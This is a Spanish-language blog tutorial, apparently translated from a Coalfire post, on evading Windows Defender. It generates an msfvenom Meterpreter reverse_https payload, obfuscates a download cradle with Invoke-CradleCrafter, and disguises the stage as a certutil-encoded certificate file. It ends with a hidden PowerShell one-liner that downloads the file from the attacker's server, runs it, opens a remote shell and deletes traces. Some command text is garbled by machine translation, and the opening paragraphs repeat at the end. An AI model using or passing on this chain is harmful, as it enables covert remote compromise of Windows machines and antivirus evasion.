Leyendo un poco por los confines de internet, me encontré con un post de coalfire sobre la ejecución de una payload ofuscada de PowerShell usando Invoke-CradleCrafter . Esto fue muy útil, ya que Windows Defender ha mejorado su juego últimamente y ahora está bloqueando el módulo Web Delivery de Metasploit.
En esta oportunidad les contare como  usar PowerShell, Invoke-CradleCrafter y Certutil.exe de Microsoft para crear una payload y una línea que se pueda usar para evadir la última versión de Windows Defender. Lo bueno de este método es que certutil de Microsoft llama a la red a su carga principal mientras que parece ser un inocente pequeño archivo de certificado en lugar de un PowerShell Invoke-Shellcode estándar, que la mayoría de los sistemas de intrusión y comportamiento están buscando en estos días.

Requisitos de instalación: Linux, Metasploit, Invoke-CradleCrafter, PowerShell para Linux y Windows 10.
Instale PowerShell para Linux y Metasploit . Cuando hago esto, prefiero ejecutar PowerShell en Linux para que Defender no se desconecte. Descarga Invoke-CradleCrafter de GitHub.

A continuación, crearemos una carga de PowerShell Meterpreter codificada en base64 realizando lo siguiente: 

msfvenom -p windows/x64/meterpreter/reverse_https LHOST = IP LPORT = 443 -e cmd / powershell_base64 -f psh -o load.txt

Tenga en cuenta que la extensión del archivo del payload puede ser cualquiera, siempre que certutil pueda acceder y leer su contenido.Si lo cambia, solo asegúrese de compensarlo cuando configure la URL en Invoke-CradleCrafter (consulte a continuación). A continuación, creará una carpeta que se usará para mostrar el contenido en web. En este ejemplo, llamaremos a nuestra carpeta de payload. Coloque el script de PowerShell Meterpreter PowerShell dentro de esta carpeta. A continuación, utilizaremos Invoke-CradleCrafter para ofuscar nuestros comandos certutil y PowerShell que se usarán para realizar una inyección en memoria sin pasar por Microsoft Defender.

Import-Module. \ Invoke-CradleCrafter.psd1; Invoke-CradleCrafter
SET URL http(s)://<SU IP>/load.txt 



Siguiente Escriba MEMORY y luego CERTUTIL :





A continuación, se le presentarán sus opciones de ofuscación. Normalmente selecciono todo y luego escribo 1.



Una vez que tenga el resultado, colóquelo en un archivo llamado raw.txt en su máquina con Windows. Codificará este archivo en base64 utilizando certutil para crear un archivo llamado cert.cer y colocarlo en un servidor web. Luego, construiremos una línea que llamará de forma remota a ese archivo y ejecutarlo en el destino. Una vez que se ejecuta, llamará a nuestra carga load.txt e inyectará Meterpreter a través de PowerShell en la memoria.

Utilice certutil para codificar el archivo raw.txt:



Parece un certificado real, ¿verdad?



Coloque su cert.cer en el directorio de cargas útiles en el que va a servir el contenido. A continuación, construiremos nuestro liner único, que puede colocarse en un archivo por lotes o ejecutarse desde la línea de comandos o desde grandes herramientas como CrackMapExec .

powershell.exe -win ocultos -exec de derivación complemento contenido -path% APPDATA% \ cert.cer (New-Object Net.WebClient) .DownloadString ( 'http: // IP SU AQUÍ / cert.cer'); certutil -decode% APPDATA% \ cert.cer% APPDATA% \ stage.ps1 & start / b cmd / c powershell.exe -exec bypass -NoExit -File% APPDATA% \ stage.ps1 & start / b cmd / c del% APPDATA% \ cert.cer

Una vez que haya configurado todo y su servidor web haya comenzado, puede ejecutar el comando anterior y debería obtener un shell Meterpreter:



Su servidor web debería obtener 2 visitas:



Defender se omite con éxito y se establece una sesión Meterpreter:



Tenga en cuenta que para que este ataque sea exitoso, el script de Meterpreter PowerShell que se ejecuta debe borrarse manualmente. El archivo cert.cer se eliminará automáticamente, pero tendrá que eliminar el archivo stage.ps1 una vez en una sesión de Meterpreter haciendo:



También tenga en cuenta que también puede simplemente pasar a PowerShell desde un shell de comandos que puede haber obtenido por otros medios y copiar el contenido de su archivo stage.ps1 para ejecutar su carga útil directamente así:










fuente: coalfire.com
Leyendo un poco por los confines de internet, me encontré con un post de coalfire sobre la ejecución de una payload ofuscada de PowerShell usando Invoke-CradleCrafter . Esto fue muy útil, ya que Windows Defender ha mejorado su juego últimamente y ahora está bloqueando el módulo Web Delivery de Metasploit.
En esta oportunidad les contare como  usar PowerShell, Invoke-CradleCrafter y Certutil.exe de Microsoft para crear una payload y una línea que se pueda usar para evadir la última versión de Windows Defender. Lo bueno de este método es que certutil de Microsoft llama a la red a su carga principal mientras que parece ser un inocente pequeño archivo de certificado en lugar de un PowerShell Invoke-Shellcode estándar, que la mayoría de los sistemas de intrusión y comportamiento están buscando en estos días.